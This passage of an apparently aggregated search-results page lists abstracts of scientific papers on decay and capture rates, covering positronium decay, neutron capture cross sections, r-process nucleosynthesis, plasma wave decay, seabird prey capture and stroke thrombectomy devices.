into photons. We report here on a precise measurement of the Ps{sup -} ground-state decay rate {Gamma}, which was carried out at the high-intensity NEutron induced POsitron source MUniCh (NEPOMUC) at the research reactor FRM II in Garching. A value of {Gamma}=2.0875(50) ns{sup -1} was obtained, which is three times more precise than previous experiments and in agreement with most recent theoretical predictions. The achieved experimental precision is at the level of the leading corrections in the theoretical predictions. 12. Probing Anderson localization of light via decay rate statistics in aperiodic Vogel spirals Christofi, Aristi; Pinheiro, Felipe A.; Dal Negro, Luca We systematically investigate the spectral properties of different types of two-dimensional aperiodic Vogel spiral arrays of pointlike scatterers and three-dimensional metamaterials with Vogel spiral chirality using rigorous Green's function spectral method. We considered an efficient T-matrix approach to analyze multiple-scattering effects, including all scattering orders, and to understand localization properties through the statistics of the Green's matrix eigenvalues. The knowledge of the spectrum of the Green matrix of multi-particle scattering systems provides important information on the character of light propagation and localization in chiral media with deterministic aperiodic geometry. In particular, we analyze for the first time the statistics of the eigenvalues and eigenvectors of the Green matrix and extract the decay rates of the eigenmodes, their inverse participation ratio (IPR), the Wigner delay times and their quality factors. We emphasize the unique properties of aperiodic Vogel spirals with respect to random scattering media, which have been investigated so far. This work was supported by the Army Research Laboratory under Cooperative Agreement Number W911NF-12-2-0023. 13. Decay rates of a molecule in the vicinity of a spherical surface of an isotropic magnetodielectric material Chung, H. Y.; Leung, P. T.; Tsai, D. P. 2012-10-01 A comprehensive study is presented on the decay rates of excited molecules in the vicinity of a magnetodielectric material of spherical geometry via electrodynamic modeling. Both the models based on a driven-damped harmonic oscillator and on energy transfers will be applied so that the total decay rates can be rigorously decomposed into the radiative and the nonradiative rates. Clarifications of the equivalence of these two models for arbitrary geometry will be provided. Different possible orientations and locations of the molecule are studied with the molecule being placed near a spherical particle or a cavity. Among other results, TE modes are observed which can be manifested via nonradiative transfer from a tangential dipole within a small range of dissipation parameters set for the spherical particle. In addition, spectral analysis shows that decay rates at such a particle with small absorption are largely dominated by radiative transfer except at multipolar resonances when nonradiative transfer becomes prominent, and relatively unmodified decay is possible when negative refraction takes place. 14. Determination of plate wave velocities and diffuse field decay rates with braod-band acousto-ultrasonic signals NASA Technical Reports Server (NTRS) Kautz, Harold E. 1993-01-01 Lowest symmetric and lowest antisymmetric plate wave modes were excited and identified in broad-band acousto-ultrasonic (AU) signals collected from various high temperature composite materials. Group velocities have been determined for these nearly nondispersive modes. An algorithm has been developed and applied to determine phase velocities and hence dispersion curves for the frequency ranges of the broad-band pulses. It is demonstrated that these data are sensitive to changes in the various stiffness moduli of the materials, in agreement by analogy, with the theoretical and experimental results of Tang and Henneke on fiber reinforced polymers. Diffuse field decay rates have been determined in the same specimen geometries and AU configuration as for the plate wave measurements. These decay rates are of value in assessing degradation such as matrix cracking in ceramic matrix composites. In addition, we verify that diffuse field decay rates respond to fiber/matrix interfacial shear strength and density in ceramic matrix composites. This work shows that velocity/stiffness and decay rate measurements can be obtained in the same set of AU experiments for characterizing materials and in specimens with geometries useful for mechanical measurements. 15. Neutron capture by Ru: Neutron cross sections of {sup 96,102,104}Ru and gamma-ray spectroscopy in the decays of {sup 97,103,105}Ru SciTech Connect Krane, K. S. 2010-04-15 Cross sections for radiative capture of neutrons have been measured for stable isotopes of Ru with mass numbers 96,102, and 104. From separate irradiations using thermal and epithermal neutrons, independent values for the thermal cross section and effective resonance integral have been determined. Spectroscopic studies of the gamma rays emitted in the decays of {sup 97,103,105}Ru have enabled improvements in the precision of the energies and intensities of the radiations along with corresponding improvements in the beta-decay feeding intensities and the energies of the levels in the respective daughter nuclei. Similar spectroscopic measurements of the decays of {sup 105}Rh (daughter of {sup 105}Ru) and {sup 96}Tc (produced from n,p reactions on {sup 96}Ru) have resulted in improved gamma-ray energies and intensities in those decays. 16. Searches for massive neutrino emission in 14C beta and 55Fe electron-capture decays SciTech Connect Wietfeldt, Fred Eberhardt 1994-05-01 In 1985 Simpson reported evidence for the emission of a 17 keV mass neutrino in a small fraction of tritium beta decays. An experimental controversy ensued in which a number of both positive and negative results were reported. The beta spectrum of 14C was collected in a unique 14C-doped planar germanium detector and a distortion was observed that initially confirmed Simpsons result. Further tests linked this distortion to a splitting of the collected charge between the central detector and the surrounding guard ring in a fraction of the events. A second 14C measurement showed no evidence for emission of a 17 keV mass neutrino. In a related experiment, a high statistics electron-capture internal-bremsstrahlung photon spectrum of 55Fe was collected with a coaxial germanium detector. A local search for departures from a smooth shape near the endpoint was performed, using a second-derivative technique. An upper limit of 0.65% (95% C.L.) for the mixing Of a neutrino in the mass range 5--25 keV was established. The upper limit on the mixing of a 17 keV mass neutrino was 0.14% (95% C.L.). 17. Exact evaluation of the rates of electrostatic decay and scattering off thermal ions for an unmagnetized Maxwellian plasma SciTech Connect Layden, B.; Cairns, Iver H.; Robinson, P. A. 2013-08-15 Electrostatic decay of Langmuir waves into Langmuir and ion sound waves (L→L′+S) and scattering of Langmuir waves off thermal ions (L+i→L′+i′, also called “nonlinear Landau damping”) are important nonlinear weak-turbulence processes. The rates for these processes depend on the quadratic longitudinal response function α{sup (2)} (or, equivalently, the quadratic longitudinal susceptibility χ{sup (2)}), which describes the second-order response of a plasma to electrostatic wave fields. Previous calculations of these rates for an unmagnetized Maxwellian plasma have relied upon an approximate form for α{sup (2)} that is valid where two of the wave fields are fast (i.e., v{sub φ}=ω/k≫V{sub e} where ω is the angular frequency, k is the wavenumber, and V{sub e} is the electron thermal speed) and one is slow (v{sub φ}≪V{sub e}). Recently, an exact expression was derived for α{sup (2)} that is valid for any phase speeds of the three waves in an unmagnetized Maxwellian plasma. Here, this exact α{sup (2)} is applied to the calculation of the three-dimensional rates for electrostatic decay and scattering off thermal ions, and the resulting exact rates are compared with the approximate rates. The calculations are performed using previously derived three-dimensional rates for electrostatic decay given in terms of a general α{sup (2)}, and newly derived three-dimensional rates for scattering off thermal ions; the scattering rate is derived assuming a Maxwellian ion distribution, and both rates are derived assuming arc distributions for the wave spectra. For most space plasma conditions, the approximate rate is found to be accurate to better than 20%; however, for sufficiently low Langmuir phase speeds (v{sub φ}/V{sub e}≈3) appropriate to some spatial domains of the foreshock regions of planetary bow shocks and type II solar radio bursts, the use of the exact rate may be necessary for accurate calculations. The relative rates of electrostatic decay 18. Approaches for the direct estimation of rate of increase in population size using capture-recapture data USGS Publications Warehouse Nichols, J.D.; Sillett, T. Scott; Hines, J.E.; Holmes, Richard T.; Ralph, C. John; Rich, Terrell D. 2005-01-01 Recent developments in the modeling of capture-recapture data permit the direct estimation and modeling of population growth rate Pradel (1996). Resulting estimates reflect changes in numbers of birds on study areas, and such changes result from movement as well as survival and reproductive recruitment. One measure of the 'importance' of a demographic vital rate to population growth is based on temporal covariation (i.e., do changes in population growth follow changes in vital rates). If data are available to estimate vital rates or their components, then such data can be combined with capture-recapture data in order to estimate parameters of the relationship between population growth and the vital rate. These methods are illustrated using capture-recapture and nest observation data for Black-throated Blue Warblers, Dendroica caerulescens, from a long-term study at Hubbard Brook Experimental Forest, New Hampshire, USA. Population growth rate was found to be positively associated with the proportion of birds that double-brood. We encourage use of these methods and believe they will prove to be very useful in research on, and management of, migratory bird populations. 19. Exact estimate of the α -decay rate and semiclassical approach in deformed nuclei Delion, D. S.; Liotta, R. J.; Wyss, R. 2015-11-01 We compare the quantum mechanical procedures to estimate the total α -decay width from deformed nuclei in the laboratory and intrinsic systems of coordinates. Our analysis shows that the total half-life estimated in the intrinsic frame by neglecting the rotational motion of the core (adiabatic approach) is one order of magnitude smaller at β2=0.3 than the corresponding value in the spherical case. A similar calculation in the laboratory system of coordinates by considering the core motion (giving the correct theoretical estimate) predicts a reduction by only a factor of 2. The widely used "angular WKB" (Wentzel-Kramers-Brillouin) semiclassical procedure provides decay widths which are comparable to the adiabatic approach. We propose a new and very simple semiclassical "angular momentum WKB" procedure to evaluate the decay width in deformed nuclei. It provides decay widths very close to the ones obtained by the exact laboratory coupling channels procedure. 20. Astrophysical reaction rates for Ni-58,Ni-60(n,gamma) from new neutron capture cross section measurements SciTech Connect Guber, Klaus H; Derrien, Herve; Leal, Luiz C; Arbanas, Goran; Wiarda, Dorothea; Koehler, Paul; Harvey, John A 2010-01-01 New neutron capture cross section of 58,60Ni were measured in the energy range from 100 eV to 600 keV using the Oak Ridge Electron Linear Accelerator (ORELA). The combination of these new neutron capture data with previous transmission data allowed a resonance analysis up to 900 keV using R-matrix theory. The theoretically determined direct capture (DC) cross sections were included in the analyses. From these resonance parameters and the DC contribution, new (n,y) astrophysical reaction rates were determined over the entire energy range needed by the lastest stellar models describing the so-called weak s process. PACS numbers: 25.40.Lw, 26.20Kn, 27.40.+z, 27.50.+e, 97.10.Cv 1. Decay rates of Gaussian-type I-balls and Bose-enhancement effects in 3+1 dimensions SciTech Connect 2014-02-03 I-balls/oscillons are long-lived spatially localized lumps of a scalar field which may be formed after inflation. In the scalar field theory with monomial potential nearly and shallower than quadratic, which is motivated by chaotic inflationary models and supersymmetric theories, the scalar field configuration of I-balls is approximately Gaussian. If the I-ball interacts with another scalar field, the I-ball eventually decays into radiation. Recently, it was pointed out that the decay rate of I-balls increases exponentially by the effects of Bose enhancement under some conditions and a non-perturbative method to compute the exponential growth rate has been derived. In this paper, we apply the method to the Gaussian-type I-ball in 3+1 dimensions assuming spherical symmetry, and calculate the partial decay rates into partial waves, labelled by the angular momentum of daughter particles. We reveal the conditions that the I-ball decays exponentially, which are found to depend on the mass and angular momentum of daughter particles and also be affected by the quantum uncertainty in the momentum of daughter particles. 2. Factors Influencing Male Plutella xylostella (Lepidoptera: Plutellidae) Capture Rates in Sex Pheromone-Baited Traps on Canola in Western Canada. PubMed Miluch, C E; Dosdall, L M; Evenden, M L 2014-12-01 Optimization of male moth trapping rates in sex pheromone-baited traps plays a key role in managing Plutella xylostella (L.). We investigated various ways to increase the attractiveness of pheromone-baited traps to P. xylostella in canola agroecosystems in AB, Canada. Factors tested included pheromone blend and dose, addition of a green leaf volatile to the pheromone at different times during the season, lure type, trap color, and height. The industry standard dose of 100 μg of pheromone (four-component blend) per lure (ConTech Enterprises Inc., Delta, British Columbia [BC], Canada) captured the most moths in the two lure types tested. Traps baited with pheromone released from gray rubber septa captured more males than those baited with red rubber septa. Traps baited with lures in which Z11-16: Ac is the main component attracted significantly more moths than those in which Z11-16: Ald is the main component. The addition of the green leaf volatile, (Z)-3-hexenyl acetate, to pheromone at a range of doses, did not increase moth capture at any point during the canola growing season. Unpainted white traps captured significantly more male moths than pheromone-baited traps that were painted yellow. Trap height had no significant effect on moth capture. Recommendations for monitoring P. xylostella in canola agroecosystems of western Canada include using a pheromone blend with Z11-16: Ac as the main component released from gray rubber septa at a dose of 100 μg. 3. Neutron-capture rates for explosive nucleosynthesis: the case of 68Ni(n, γ)69Ni DOE PAGES Spyrou, Artemis; Larsen, Ann-Cecilie; Liddick, Sean N.; ... 2017-02-22 Neutron-capture reactions play an important role in heavy element nucleosynthesis, since they are the driving force for the two processes that create the vast majority of the heavy elements. When a neutron capture occurs on a short-lived nucleus, it is extremely challenging to study the reaction directly and therefore the use of indirect techniques is essential. The present work reports on such an indirect measurement that provides strong constraints on the 68Ni(n,g)69Ni reaction rate.The commonly used reaction libraries JINA-REACLIB and BRUSLIB are in relatively good agreement with the experimental rate. The impact of the new rate on weak r-process calculationsmore » is discussed.« less 4. A coupled deterministic/stochastic method for computing neutron capture therapy dose rates Hubbard, Thomas Richard Neutron capture therapy (NCT) is an experimental method of treating brain tumors and other cancers by: (1) injecting or infusing the patient with a tumor-seeking, neutron target-labeled drug; and (2) irradiating the patient in an intense epithermal neutron fluence. The nuclear reaction between the neutrons and the target nuclei (e.g. sp{10}B(n,alpha)sp7Lirbrack releases energy in the form of high-LET (i.e. energy deposited within the range of a cell diameter) reaction particles which selectively kill the tumor cell. The efficacy of NCT is partly dependent on the delivery of maximum thermal neutron fluence to the tumor and the minimization of radiation dose to healthy tissue. Since the filtered neutron source (e.g. research reactor) usually provides a broad energy spectrum of highly-penetrating neutron and gamma-photon radiation, detailed transport calculations are necessary in order to plan treatments that use optimal treatment facility configurations and patient positioning. Current computational methods for NCT use either discrete ordinates calculation or, more often, Monte Carlo simulation to predict neutron fluences in the vicinity of the tumor. These methods do not, however, accurately calculate the transport of radiation throughout the entire facility or the deposition of dose in all the various parts of the body due to shortcomings of using either method alone. A computational method, specifically designed for NCT problems, has been adapted from the MASH methodology and couples a forward discrete ordinates (Ssb{n}) calculation with an adjoint Monte Carlo run to predict the dose at any point within the patient. The transport from the source through the filter/collimator is performed with a forward DORT run, and this is then coupled to adjoint MORSE results at a selected coupling parallelepiped which surrounds human phantom. Another routine was written to allow the user to generate the MORSE models at various angles and positions within the treatment room. The 5. Environmental Controls on Cumulative and Yearly Litter Decay Rates Over Four Years in Forested and Harvested Sites Across Canada Trofymow, J. A.; Thompson, E.; Cameron, A.; Pare, D.; Amiro, B. D.; Lavigne, M.; Smyth, C.; Black, T. A.; Barr, A. G.; Margolis, H. A. 2010-12-01 weak. Both temperature and moisture accounted for differences in cumulative decay rates and mass loss of surface litter among forest site type and cover, though soil microenvironment accounted for more variation than did site climate. Forest site type and cover effects were still significant even when controlled for microenvironment, suggesting other soil or biotic factors need to be accounted for in predicting litter decay. 6. Large O(m-2c) nonperturbative corrections to the inclusive rate of the decay B -> Xsγ Voloshin, M. B. 1997-02-01 It is shown that the inclusive rate of the rare weak radiative decays B -> Xsγ contains a series of nonperturbative corrections, whose short distance' scale is set by m-1c, rather than bym-1b . The first correction in this series is expressed through the chromomagnetic interaction of the b quark inside the B meson and the relative magnitude of the effect is determined by the ratio /m2c. Though the magnitude of this first correction is suppressed by a numerical coefficient, the sensitivity of the decay rate to the distance scale m-1c may significantly limit the accuracy of purely perturbative predictions for the rate. 7. Large-scale evaluation of β -decay rates of r -process nuclei with the inclusion of first-forbidden transitions Marketin, T.; Huther, L.; Martínez-Pinedo, G. 2016-02-01 Background: r -process nucleosynthesis models rely, by necessity, on nuclear structure models for input. Particularly important are β -decay half-lives of neutron-rich nuclei. At present only a single systematic calculation exists that provides values for all relevant nuclei making it difficult to test the sensitivity of nucleosynthesis models to this input. Additionally, even though there are indications that their contribution may be significant, the impact of first-forbidden transitions on decay rates has not been systematically studied within a consistent model. Purpose: Our goal is to provide a table of β -decay half-lives and β -delayed neutron emission probabilities, including first-forbidden transitions, calculated within a fully self-consistent microscopic theoretical framework. The results are used in an r -process nucleosynthesis calculation to asses the sensitivity of heavy element nucleosynthesis to weak interaction reaction rates. Method: We use a fully self-consistent covariant density functional theory (CDFT) framework. The ground state of all nuclei is calculated with the relativistic Hartree-Bogoliubov (RHB) model, and excited states are obtained within the proton-neutron relativistic quasiparticle random phase approximation (p n -RQRPA). Results: The β -decay half-lives, β -delayed neutron emission probabilities, and the average number of emitted neutrons have been calculated for 5409 nuclei in the neutron-rich region of the nuclear chart. We observe a significant contribution of the first-forbidden transitions to the total decay rate in nuclei far from the valley of stability. The experimental half-lives are in general well reproduced for even-even, odd-A , and odd-odd nuclei, in particular for short-lived nuclei. The resulting data table is included with the article as Supplemental Material. Conclusions: In certain regions of the nuclear chart, first-forbidden transitions constitute a large fraction of the total decay rate and must be 8. Calculation of the decay rate of tachyonic neutrinos against charged-lepton-pair and neutrino-pair Cerenkov radiation Jentschura, Ulrich D.; Nándori, István; Ehrlich, Robert 2017-10-01 We consider in detail the calculation of the decay rate of high-energy superluminal neutrinos against (charged) lepton pair Cerenkov radiation, and neutrino pair Cerenkov radiation, i.e., against the decay channels ν \\to ν {e}+ {e}- and ν \\to ν \\overline{ν } ν . Under the hypothesis of a tachyonic nature of neutrinos, these decay channels put constraints on the lifetime of high-energy neutrinos for terrestrial experiments as well as on cosmic scales. For the oncoming neutrino, we use the Lorentz-covariant tachyonic relation {E}ν =\\sqrt{{p}2-{m}ν 2}, where m ν is the tachyonic mass parameter. We derive both threshold conditions as well as on decay and energy loss rates, using the plane-wave fundamental bispinor solutions of the tachyonic Dirac equation. Various intricacies of rest frame versus lab frame calculations are highlighted. The results are compared to the observations of high-energy IceCube neutrinos of cosmological origin. 9. Modification of magicity toward the dripline and its impact on electron-capture rates for stellar core collapse 2016-02-01 The importance of microphysical inputs from laboratory nuclear experiments and theoretical nuclear structure calculations in the understanding of core-collapse dynamics and the subsequent supernova explosion is largely recognized in the recent literature. In this work, we analyze the impact of the masses of very neutron-rich nuclei on the matter composition during collapse and the corresponding electron-capture rate. To this end, we introduce an empirical modification of the popular Duflo-Zuker mass model to account for possible shell quenching far from stability. We study the effect of this quenching on the average electron-capture rate. We show that the pre-eminence of the closed shells with N =50 and N =82 in the collapse dynamics is considerably decreased if the shell gaps are reduced in the region of 78Ni and beyond. As a consequence, local modifications of the overall electron-capture rate of up to 30% can be expected, depending on the strength of magicity quenching. This finding has potentially important consequences on the entropy generation, the neutrino emissivity, and the mass of the core at bounce. Our work underlines the importance of new experimental measurements in this region of the nuclear chart, the most crucial information being the nuclear mass and the Gamow-Teller strength. Reliable microscopic calculations of the associated elementary rate, in a wide range of temperatures and electron densities, optimized on these new empirical information, will be additionally needed to get quantitative predictions of the collapse dynamics. 10. TREVO and Capture LP have equal technical success rates in mechanical thrombectomy of proximal and distal anterior circulation occlusions. PubMed Protto, Sara; Pienimäki, Juha-Pekka; Seppänen, Janne; Matkaselkä, Ira; Ollikainen, Jyrki; Numminen, Heikki; Sillanpää, Niko 2017-07-01 Mechanical thrombectomy (MT) is a proven method to treat large vessel occlusions in acute anterior circulation stroke. We compared the technical, imaging, and clinical outcomes of MT performed with either TREVO or Capture LP devices. There were 42 and 43 patients in the TREVO and Capture LP groups, respectively. Baseline variables, technical outcome (Thrombolysis In Cerebral Infarction, TICI), 24 hours imaging outcome, and 3-month clinical outcome (modified Rankin Scale, mRS) were prospectively recorded. The patients were stratified according to clot location, groups compared, and logistic regression models devised to study the effect of device selection on the clinical outcome. The technical success rates were equal in both proximal (internal carotid artery and proximal M1 segment) and distal occlusions (distal M1 and M2 segments). The proportion of TICI 2b or 3 was 96% and 87% with TREVO and 87% and 89% with Capture LP (p=0.25 and p=0.80, respectively). Device selection did not significantly predict good clinical outcome (mRS ≤2) in either proximal or distal occlusions. In multivariate analysis, selecting Capture LP borderline significantly increased the odds of an excellent outcome close to sixfold both in proximal and distal occlusions (OR 6.7, 95% CI 0.82 to 53.7, p=0.08 and OR 5.7, 95% CI 0.88 to 37.8, p=0.07, respectively). TREVO and Capture LP perform equally well in proximal and distal occlusions in the anterior circulation when technical and good clinical outcome are considered. Capture LP may have a small advantage in reaching mRS ≤1 at 3 months. However, this needs to be confirmed in a randomized study. Published by the BMJ Publishing Group Limited. For permission to use (where not already granted under a licence) please go to http://www.bmj.com/company/products-services/rights-and-licensing/. 11. Observation of Dicke superradiance for two artificial atoms in a cavity with high decay rate. PubMed Mlynek, J A; Abdumalikov, A A; Eichler, C; Wallraff, A 2014-11-04 An individual excited two-level system decays to its ground state in a process known as spontaneous emission. The probability of detecting the emitted photon decreases exponentially with the time passed since its excitation. In 1954, Dicke first considered the more subtle situation in which two emitters decay in close proximity to each other. He argued that the emission dynamics of a single two-level system is altered by the presence of a second one, even if it is in its ground state. Here, we present a close to ideal realization of Dicke's original two-spin Gedankenexperiment, using a system of two individually controllable superconducting qubits weakly coupled to a fast decaying microwave cavity. The two-emitter case of superradiance is explicitly demonstrated both in time-resolved measurements of the emitted power and by fully reconstructing the density matrix of the emitted field in the photon number basis. 12. Enhanced Dark Matter Annihilation Rate for Positron and Electron Excesses from Q-Ball Decay SciTech Connect McDonald, John 2009-10-09 We show that Q-ball decay in Affleck-Dine baryogenesis models can account for dark matter when the annihilation cross section is sufficiently enhanced to explain the positron and electron excesses observed by PAMELA, ATIC, and PPB-BETS. For Affleck-Dine baryogenesis along a d=6 flat direction, the reheating temperature is approximately 30 GeV and the Q-ball decay temperature is in the range of 10-100 MeV. The lightest supersymmetric particles produced by Q-ball decay annihilate down to the observed dark matter density if the cross section is enhanced by a factor approx10{sup 3} relative to the thermal relic cross section. 13. Rates, polarizations, and asymmetries in charmless vector-vector B meson decays. PubMed 2003-10-24 With a sample of approximately 89 x 10(6) B(-)B pairs collected with the BABAR detector, we perform a search for B meson decays into pairs of charmless vector mesons (phi, rho, and K*). We measure the branching fractions, determine the degree of longitudinal polarization, and search for CP violation asymmetries in the processes B+-->phiK(*+), B0-->phiK(*0), B+-->rho(0)K(*+), and B+-->rho(0)rho(+). We also set an upper limit on the branching fraction for the decay B0-->rho(0)rho(0). 14. Shell-model calculations of beta-decay rates for s- and r-process nucleosyntheses Takahashi, K.; Mathews, G. J.; Bloom, S. D. 1985-10-01 Examples of large-basis shell-model calculations of Gamow-Teller (BETA)-decay properties of specific interest in the astrophysical s- and r- processes are presented. Numerical results are given for: (1) the GT-matrix elements for the excited state decays of the unstable s-process nucleus Tc-99; and (2) the GT-strength function for the neutron-rich nucleus Cd-130, which lies on the r-process path. The results are discussed in conjunction with the astrophysics problems. 15. Rates, Polarizations, and Asymmetries in Charmless Vector-Vector B Meson Decays 2003-10-01 With a sample of approximately 89×106 BB¯ pairs collected with the BABAR detector, we perform a search for B meson decays into pairs of charmless vector mesons (φ, ρ, and K*). We measure the branching fractions, determine the degree of longitudinal polarization, and search for CP violation asymmetries in the processes B+→φK*+, B0→φK*0, B+→ρ0K*+, and B+→ρ0ρ+. We also set an upper limit on the branching fraction for the decay B0→ρ0ρ0. 16. Residence times and decay rates of downed woody debris biomass/carbon in eastern US forests Treesearch Matthew B. Russell; Christopher W. Woodall; Shawn Fraver; Anthony W. D' Amato; Grant M. Domke; Kenneth E. Skog 2014-01-01 A key component in describing forest carbon (C) dynamics is the change in downed dead wood biomass through time. Specifically, there is a dearth of information regarding the residence time of downed woody debris (DWD), which may be reflected in the diversity of wood (for example, species, size, and stage of decay) and site attributes (for example, climate) across the... 17. Measurement of the Branching Fraction and Decay Rate Asymmetry of B to D_pi+ pi- pi0 K- SciTech Connect Aubert, B.; Barate, R.; Boutigny, D.; Couderc, F.; Karyotakis, Y.; Lees, J.P.; Poireau, V.; Tisserand, V.; Zghiche, A.; Grauges, E.; Palano, A.; Pappagallo, M.; Pompili, A.; Chen, J.C.; Qi, N.D.; Rong, G.; Wang, P.; Zhu, Y.S.; Eigen, G.; Ofte, I.; Stugu, B. /Bergen U. /LBL, Berkeley /UC, Berkeley /Birmingham U. /Ruhr U., Bochum /Bristol U. /British Columbia U. /Brunel U. /Novosibirsk, IYF /UC, Irvine /UCLA /UC, Riverside /UC, San Diego /UC, Santa Barbara /UC, Santa Cruz /Caltech /Cincinnati U. /Colorado U. /Colorado State U. /Dortmund U. /Dresden, Tech. U. /Ecole Polytechnique /Edinburgh U. /Ferrara U. /INFN, Ferrara /Frascati /Genoa U. /INFN, Genoa /Harvard U. /Heidelberg U. /Imperial Coll., London /Iowa U. /Iowa State U. /Orsay, LAL /LLNL, Livermore /Liverpool U. /Queen Mary, U. of London /Royal Holloway, U. of London /Louisville U. /Manchester U. /Maryland U. /Massachusetts U., Amherst /MIT, LNS /McGill U. /Milan U. /INFN, Milan /Mississippi U. /Montreal U. /Mt. Holyoke Coll. /Naples U. /INFN, Naples /NIKHEF, Amsterdam /Notre Dame U. /Ohio State U. /Oregon U. /Padua U. /INFN, Padua /Paris U., VI-VII /Pennsylvania U. /Perugia U. /INFN, Perugia /Pisa U. /INFN, Pisa /Prairie View A-M /Princeton U. /Rome U. /INFN, Rome /Rostock U. /Rutherford /DAPNIA, Saclay /South Carolina U. /SLAC /Oregon U. /SLAC /SLAC /Stanford U., Phys. Dept. /SUNY, Stony Brook /Tennessee U. /Texas U. /Texas U., Dallas /Turin U. /INFN, Turin /Trieste U. /INFN, Trieste /Valencia U., IFIC /Vanderbilt U. /Victoria U. /Warwick U. /Wisconsin U., Madison /Yale U. 2005-06-10 The authors report the observation of the decay B{sup -} {yields} D{sub {pi}{sup +}{pi}{sup -}{pi}{sup 0}}K{sup -}, where D{sub {pi}{sup +}{pi}{sup -}{pi}{sup 0}} indicates a neutral D meson detected in the final state {pi}{sup +}{pi}{sup -}{pi}{sup 0}, excluding K{sub S}{sup 0}{pi}{sup 0}. This doubly Cabibbo-suppressed decay chain can be used to measure the CKM phase {gamma}. Using about 229 million e{sup +}e{sup -} {yields} B{bar B} events recorded by the BABAR experiment at the PEP-II e{sup +}e{sup -} storage ring, they measure the branching fraction {Beta}(B{sup -} {yields} D{sub {pi}{sup +}{pi}{sup -}{pi}{sup 0}K{sup -}}) = (5.5 {+-} 1.0 (stat.) {+-} 0.7 (syst.)) x 10{sup -6} and the decay rate asymmetry A = -0.02 {+-} 0.16 (stat.) {+-} 0.03 (syst.) for the full decay chain. 18. Experimental investigation of effects of jet decay rate on jet-induced pressures on a flat plate: Tabulated data NASA Technical Reports Server (NTRS) Kuhlman, J. M.; Ousterhout, D. S.; Warcup, R. W. 1978-01-01 Tabular data are presented for an experimental study of the effects of jet decay rate on the jet-induced pressure distribution on a flat plate for a single jet issuing at right angle to the flat plate into a uniform crossflow. The data are presented in four sections: (1) presents the static nozzle calibration data; (2) lists the plate surface static pressure data and integrated loads; (3) lists the jet centerline trajectory data; and (4) lists the centerline dynamic pressure data. 19. Detailed microscopic calculation of stellar electron and positron capture rates on 24Mg for O+Ne+Mg core simulations Nabi, Jameel-Un 2008-09-01 A few white dwarfs, located in binary systems, may acquire sufficiently high mass-accretion rates resulting in the burning of carbon and oxygen under nondegenerate conditions forming an O+Ne+Mg core. These O+Ne+Mg cores are gravitationally less bound than more massive progenitor stars and can release more energy due to the nuclear burning. They are also amongst the probable candidates for low entropy r-process sites. Recent observations of subluminous Type II-P supernovae (e.g. 2005cs, 2003gd, 1999br and 1997D) were able to rekindle the interest in 8-10 Modot which develop O+Ne+Mg cores. Microscopic calculations of capture rates on 24Mg, which may contribute significantly to the collapse of O+Ne+Mg cores, using the shell model and the proton-neutron quasiparticle random-phase approximation (pn-QRPA) theory, were performed earlier and comparisons made. Simulators, however, may require these capture rates on a fine scale. For the first time, a detailed microscopic calculation of the electron and positron capture rates on 24Mg on an extensive temperature-density scale is presented here. This type of scale is more appropriate for interpolation purposes and of greater utility for simulation codes. The calculations are done using the pn-QRPA theory using a separable interaction. The deformation parameter, believed to be a key parameter in QRPA calculations, is adopted from experimental data to increase the reliability of the QRPA results further. The resulting calculated rates are up to a factor of 14 or more enhanced as compared to shell model rates and may lead to some interesting scenarios for core collapse simulators. 20. Power Spectrum Analysis of Physikalisch-Technische Bundesanstalt Decay-Rate Data: Evidence for Solar Rotational Modulation Sturrock, P. A.; Buncher, J. B.; Fischbach, E.; Gruenwald, J. T.; Javorsek, D.; Jenkins, J. H.; Lee, R. H.; Mattes, J. J.; Newport, J. R. 2010-12-01 Evidence for an anomalous annual periodicity in certain nuclear-decay data has led to speculation on a possible solar influence on nuclear processes. We have recently analyzed data concerning the decay rates of 36Cl and 32Si, acquired at the Brookhaven National Laboratory (BNL), to search for evidence that might be indicative of a process involving solar rotation. Smoothing of the power spectrum by weighted-running-mean analysis leads to a significant peak at frequency 11.18 year-1, which is lower than the equatorial synodic rotation rates of the convection and radiative zones. This article concerns measurements of the decay rates of 226Ra acquired at the Physikalisch-Technische Bundesanstalt (PTB) in Germany. We find that a similar (but not identical) analysis yields a significant peak in the PTB dataset at frequency 11.21 year-1, and a peak in the BNL dataset at 11.25 year-1. The change in the BNL result is not significant, since the uncertainties in the BNL and PTB analyses are estimated to be 0.13 year-1 and 0.07 year-1, respectively. Combining the two running means by forming the joint power statistic leads to a highly significant peak at frequency 11.23 year-1. We will briefly comment on the possible implications of these results for solar physics and for particle physics. 1. General decay rates for the wave equation with mixed-type damping mechanisms on unbounded domain with finite measure Dias Silva, Flávio R.; Nascimento, Flávio A. F.; Rodrigues, José H. 2015-12-01 This paper is concerned with the study of the uniform decay rates of the energy associated with the wave equation subject to a locally distributed viscoelastic dissipation and a nonlinear frictional damping u_{tt}- Δ u+ int_0^t g(t-s)div[a(x)nabla u(s)] ds + b(x) f(u_t)=0 quad on quad Ω×]0,infty[, where {Ωsubset{R}^n, n≥ 2} is an unbounded open set with finite measure and unbounded smooth boundary {partialΩ = Γ}. Supposing that the localization functions satisfy the "competitive" assumption {a(x)+b(x)≥δ>0} for all {xin Ω} and the relaxation function g satisfies certain nonlinear differential inequalities introduced by Lasiecka et al. (J Math Phys 54(3):031504, 2013), we extend to our considered domain the prior results of Cavalcanti and Oquendo (SIAM J Control Optim 42(4):1310-1324, 2003). In addition, while in Cavalcanti and Oquendo (2003) the authors just consider exponential and polynomial decay rate estimates, in the present article general decay rate estimates are obtained. 2. Modelling the Effects of Prey Size and Distribution on Prey Capture Rates of Two Sympatric Marine Predators PubMed Central Thaxter, Chris B.; Daunt, Francis; Grémillet, David; Harris, Mike P.; Benvenuti, Silvano; Watanuki, Yutaka; Hamer, Keith C.; Wanless, Sarah 2013-01-01 Understanding how prey capture rates are influenced by feeding ecology and environmental conditions is fundamental to assessing anthropogenic impacts on marine higher predators. We compared how prey capture rates varied in relation to prey size, prey patch distribution and prey density for two species of alcid, common guillemot (Uria aalge) and razorbill (Alca torda) during the chick-rearing period. We developed a Monte Carlo approach parameterised with foraging behaviour from bird-borne data loggers, observations of prey fed to chicks, and adult diet from water-offloading, to construct a bio-energetics model. Our primary goal was to estimate prey capture rates, and a secondary aim was to test responses to a set of biologically plausible environmental scenarios. Estimated prey capture rates were 1.5±0.8 items per dive (0.8±0.4 and 1.1±0.6 items per minute foraging and underwater, respectively) for guillemots and 3.7±2.4 items per dive (4.9±3.1 and 7.3±4.0 items per minute foraging and underwater, respectively) for razorbills. Based on species' ecology, diet and flight costs, we predicted that razorbills would be more sensitive to decreases in 0-group sandeel (Ammodytes marinus) length (prediction 1), but guillemots would be more sensitive to prey patches that were more widely spaced (prediction 2), and lower in 